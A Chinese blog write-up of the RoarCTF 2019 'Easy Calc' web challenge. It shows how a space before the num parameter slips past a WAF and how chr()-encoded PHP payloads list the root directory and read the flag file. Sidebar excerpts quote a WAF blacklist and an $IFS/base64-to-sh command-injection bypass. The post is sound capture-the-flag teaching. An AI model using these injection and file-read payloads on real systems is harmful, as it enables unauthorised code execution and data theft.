日常练习之web([RoarCTF 2019]Easy Calc)

最新推荐文章于 2024-04-03 11:24:16 发布
最新推荐文章于 2024-04-03 11:24:16 发布
阅读量121 收藏
点赞数
分类专栏: web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/doraemon12345/article/details/110880516
版权

题目要点
①var_dump()
函数用于输出变量的相关信息;判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构
②scandir()
列出参数目录中的文件和目录
③file_get_contents()
把整个文件读入一个字符串中。
④waf
waf不允许num传字母,我们可以加个空格它就无法识别“ num”和“num”,php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。
题解
打开题目,在源码中发现提示
在这里插入图片描述空格绕过waf执行语句

calc.php? num=1;var_dump(scandir(chr(47)))

这里因为" / "被过滤了所以用ascii绕过,得到flag位置
在这里插入图片描述
然后用file_get_contents()函数查看flagg文件,执行语句

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

得到flag
在这里插入图片描述

flag{39ac3669-4944-43d9-81b0-d1c6ef9c7dcd}

south_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第十三题——[RoarCTF 2019]Easy Calc
分享简单的安全技术
04-05 274
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,发现有一个输入栏叫我们输入计算表达式,按f12查看提示,看到一个calc.php页面且参数为num,且calc设置了WAF保护措施。 第二步:访问calc.php页面发现WAF安全规则以及参数检测 可以看到calc.php页面对num参数进行了规定,不允许参入空格以及其他的特殊字符 让num传入数字,在页面上返回数字 让num传入非数字,发现WAF限制 第三步:绕过WAF WAF检测的是"
[RoarCTF 2019]Easy Calc -wp
freerats的博客
06-21 365
打开环境,发现一个简单的计算器,查看源码 提示上了waf,然后还有一个calc.php,访问页面 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
解护网杯一道webEasyChallenge)
洞若观火
10-13 1065
题目初始只给20元钱,一个大辣条5元,一个辣条之王需要5个大辣条,恰巧不够。。。 凑够大辣条:无意快速点击了两此购买,显示购买了两次,由此联想到,购买和钱数更新没有做约束,于是开多线程发包请求 凑够了五个大辣条,(最多刷出过18个大辣条) 于是开始对辣条之王的输入框进行测试。采用注入,多线程请求均无效。输入一个很大的数字时,提示非法,于是考虑到数据溢出,开始爆破测试临界点 ...
BUUCTF-web-[RoarCTF 2019]Easy Calc
weixin_44866139的博客
05-15 616
有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num'];
[RoarCTF 2019]Easy Calc
热门推荐
沐目的博客
10-18 1万+
1.知识点 1.1PHP的字符串解析特性 这是别人对PHP字符串解析漏洞的理解, 我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id...
练习 18 Web [RoarCTF 2019]Easy Calc
最新发布
离暑假还有41天的博客
04-03 710
表达式注入,被屏蔽字符的处理方式
渗透测试练习题解析 1(CTF web
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-08 1044
简单来说waf就是防火墙,用来保护网页信息,它对其中一种恶意注入方式sql注入的防护方式如下:1、严格限制Web应用的数据库的操作权限,给此用户提供仅仅能够满足其工作的最低权限,从而最大限度的减少注入攻击对数据库的危害。2、检查输入的数据是否具有所期望的数据格式,
题解记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 2145
BUUCTF Web
Calc Easy-开源
05-29
【标题】"Calc Easy-开源"是一个开源软件项目,它提供了一个相当简单的快速计算器的实现。这个项目的重点在于它的开源特性,意味着源代码是公开的,任何人都可以查看、学习、修改或分发这个计算器的代码。开源软件的...
calc-ui-web
02-26
【标题解析】:“calc-ui-web”这个标题暗示我们正在处理一个与计算器用户界面相关的Web项目。"calc-ui"部分指的是计算器的用户界面,而“web”则表明这是在Web环境中实现的。考虑到“calc-ui-web”可能是项目的名字...
calcCalc Web服务
03-03
安全方面,Calc Web服务需要考虑防止XSS(跨站脚本攻击)和CSRF(跨站请求伪造)等常见Web安全问题。通过验证用户输入、使用HTTP头部的CSRF令牌以及实施同源策略,可以有效地保护服务免受这些威胁。 对于数据持久化...
calc:节点-练习
03-12
在这个“calc:节点-练习”中,我们可以推测这是一个关于JavaScript中计算逻辑和数据处理的学习项目或者挑战。下面我们将深入探讨JavaScript中的相关知识点。 1. **变量与数据类型**:JavaScript是动态类型语言,这...
clcalc:先进的基于 Web 的命令行样式计算器
08-04
Cl Calc 是一个开源的、轻量级的、命令行风格的基于 Web 的计算器。 它构建为一个完全静态的网站,并通过 GitHub Pages 托管。 由于完全静态,Cl Calc 在客户端执行所有计算。 Cl Calc 可以作为渐进式 Web 应用程序...
CTFshow——web入门(信息泄露)
doraemon12345的博客
05-30 1391
web1 源码泄露 直接 f12 在下面注释行中可以看到flag web2 前台js绕过 方法有很多: 1.ctrl+u 查看源代码 2.burp抓包查看 3.在网址前加上view-source:即可查看源代码 web3 协议头信息泄露 题目提示没思路抓包看看,就用burp抓个包看看,在响应头里发现flag web4 robots后台泄露 题目提示:总有人把后台地址写入robots,帮黑阔大佬们引路。 访问robots.txt,得到flag地址/flagishere.txt,访问该地址拿到flag web
学习任意文件下载漏洞
doraemon12345的博客
05-27 1174
什么是任意文件下载漏洞 文件下载漏洞是指文件下载功能没有对下载的文件类型、目录做合理严谨的过滤,导致用户可以下载服务器的任意文件。 任意文件下载漏洞的危害 用户可以任意下载文件,例如脚本、代码服务器配置文件等。利用得到的代码进行审计分析有可能得到其它漏洞来进行攻击 任意文件下载漏洞如何利用 Google hacking上看 inurl:"readfile.php?file=" 从链接上看: download.php?path= download.php?file= down.php?file= data.
日常练习web(Ping Ping Ping)
doraemon12345的博客
11-26 1039
打开题目是/?ip= 猜测应该是命令执行,先试一下?ip=127.0.0.1;cat flag 发现过滤了空格,尝试?ip=127.0.0.1;ls 发现flag.php,绕过空格 /?ip=127.0.0.1;cat$IFS$9flag.php flag被过滤了,换一种方法先看看index.php /?ip=127.0.0.1;cat$IFS$9index.php 发现bash也没了,不过可以用sh来执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh Y2F0
第二届金盾信安杯部分wp
doraemon12345的博客
12-21 793
1.注意数字 打开压缩包是个图片,分离得到一个加密压缩包,看似加密实则是伪加密,修正后得到1.txt,是一个多层base64,解密后得到 但是这并不是flag,题目提示注意数字,图片上是李白的诗,有数字3和9,一开始以为是凯撒或者栅栏,试过之后无果,就去查还有哪些移位密码,找到仿射密码比较符合已知条件解密得到flag 2.小火龙 下载文件是个jpg图片放到winhex里查看,发现是png图片,拉到最底部,看到压缩包flag.txt,和pass 手动分离得到压缩包,然后用密码打开得到flag 3.我和十
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值